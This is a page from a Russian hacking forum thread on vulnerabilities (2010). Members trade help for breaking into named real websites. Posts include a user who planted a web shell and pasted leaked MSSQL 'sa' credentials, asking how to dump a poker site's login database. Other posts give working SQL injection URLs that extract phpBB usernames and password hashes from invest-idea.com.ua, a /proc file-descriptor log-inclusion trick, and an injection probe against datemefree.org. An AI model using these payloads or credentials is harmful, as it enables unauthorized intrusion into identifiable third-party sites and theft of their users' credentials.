ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12411  
Старый 07.04.2010, 01:40
Аватар для [Feldmarschall]
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

Цитата:
Сообщение от AC//DC  
так щас пишет что Сайт временно отключен
наверное попалили
нет так он и есть.. там 100% есть уязвимость
 
Ответить с цитированием

  #12412  
Старый 07.04.2010, 02:57
Аватар для Darren
Darren
Banned
Регистрация: 14.06.2008
Сообщений: 34
Провел на форуме:
119183

Репутация: 13
Отправить сообщение для Darren с помощью ICQ
По умолчанию

Залил на один ресурс шелл от madneta
прочитал файл msql-конфиг внём такая инфа

objconn.Open "Provider=SQLOLEDB;Data Source=(Local);INITIAL Catalog=POKER; User Id=sa;Password=sas;"
objconn.Open "Provider=SQLOLEDB;Data Source=(Local);INITIAL Catalog=POKER; User Id=sa;Password=ichsss;"

Мне нужно слить базу логинов и пассов. Пытаюсь приконектиться к базе через шелл, localhost
используя: логин: sa пасс:sas - не конектится, ошибка
логин=sa;Password=ichsss - тоже самое

попробывал зайти в каталог: С/msql_data_files/
там лежат папки баз от других сайтов на этом хосте но папки POKER нет (
В админку не залогиниться т.к. админ переименовал файл админки а в корневой папке ~500 файлов.
Что посоветуете господа? Очень нужно слить базу, help somebody
(новичок)

Последний раз редактировалось Darren; 07.04.2010 в 03:14..
 
Ответить с цитированием

  #12413  
Старый 07.04.2010, 03:07
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

попробуй http://sourceforge.net/projects/phpmsadmin/files/
 
Ответить с цитированием

  #12414  
Старый 07.04.2010, 15:14
Аватар для гостъ
гостъ
Новичок
Регистрация: 04.01.2010
Сообщений: 6
Провел на форуме:
313054

Репутация: 0
По умолчанию

Цитата:
Сообщение от MuTANta  
ну когда есть .как узнать какая цифра и на какой лог ссылается ссыока
Вобщем так, для ясности и на глядности что и где:

Можешь посмотреть сначала на /proc/self/status на значение pid, если ты не понял то self ето ссылка на етот пид, обращайся на /proc/цыфра_которой_соответствуе т_pid/2, а там уже
Код:
ls -la /proc/цыфра_которой_соответствует_pid/fd/
итого 0
dr-x------ 2 apache apache  0 2010-04-07 14:04 ./
dr-xr-xr-x 7 apache apache  0 2010-04-07 13:56 ../
lr-x------ 1 apache apache 64 2010-04-07 14:04 0 -> /dev/null
l-wx------ 1 apache apache 64 2010-04-07 14:04 1 -> /dev/null
l-wx------ 1 apache apache 64 2010-04-07 14:04 2 -> /var/log/httpd/error_log
ссылка на логи, а проинклудишь или нет, зависит от прав.

UPD
Кстате ты интересовался именно цыфрой, она от одмина не зависит, зависит только от количества логов который использует апач. Если хостинг апач с под пользоваетлся, на огромном хостинге то попадешь на 2, если с под апача туева куча то будешь искать, как подсказывает опыт.

Последний раз редактировалось гостъ; 07.04.2010 в 15:19..
 
Ответить с цитированием

  #12415  
Старый 07.04.2010, 15:41
Аватар для Slay90
Slay90
Участник форума
Регистрация: 12.04.2009
Сообщений: 129
Провел на форуме:
150009

Репутация: 14
По умолчанию

подобрал на сайте баблицу с логинами и пассами
Код:
http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x70687062625f7573657273--
назнаю как извлечь user_id,username,user_password

Код:
http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,concat_ws(0x3b,user_id,username,user_password)+from+information_schema.tables--
вот так не получается(((((( подскажите пожалуйста!!! с меня +++ !!!
 
Ответить с цитированием

  #12416  
Старый 07.04.2010, 16:16
Аватар для Redwood
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от Slay90  
подобрал на сайте баблицу с логинами и пассами
Код:
http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x70687062625f7573657273--
назнаю как извлечь user_id,username,user_password

Код:
http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,concat_ws(0x3b,user_id,username,user_password)+from+information_schema.tables--
вот так не получается(((((( подскажите пожалуйста!!! с меня +++ !!!
Тебе надо user_id, username и user_password тащить не из information_schema.tables, а из таблицы, которую ты указал в первом запросе

Последний раз редактировалось Redwood; 07.04.2010 в 16:30..
 
Ответить с цитированием

  #12417  
Старый 07.04.2010, 16:34
Аватар для Slay90
Slay90
Участник форума
Регистрация: 12.04.2009
Сообщений: 129
Провел на форуме:
150009

Репутация: 14
По умолчанию

http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,concat_ws(0x3b,user_id,username,u ser_password)+from+0x70687062625f7573657273--

Делаю не получается =\ подскажите как правильно смотреть содержимое столбцов таблиц
 
Ответить с цитированием

  #12418  
Старый 07.04.2010, 17:03
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

_http://www.invest-idea.com.ua/news.php?id=-1+union+select+1,concat_ws(0x3a,username,user_pass word)+from+phpbb_users+limit+86,1--+
 
Ответить с цитированием

  #12419  
Старый 07.04.2010, 17:08
Аватар для daniel_1024
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831

Репутация: 34
По умолчанию

я через админку залил шелл, прохожу по ссылке и вижу "500. Внутренняя ошибка". Либо с правами на директорию что-то, либо с htaccess. Что посоветуете ?
 
Ответить с цитированием

  #12420  
Старый 07.04.2010, 17:15
Аватар для auth_root
auth_root
Новичок
Регистрация: 01.02.2010
Сообщений: 12
Провел на форуме:
52455

Репутация: 18
По умолчанию

http://www.datemefree.org/guestbook.php?to=-124926+order+by+1/*
Не могу никак подобрать поля, не обрезается запрос.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ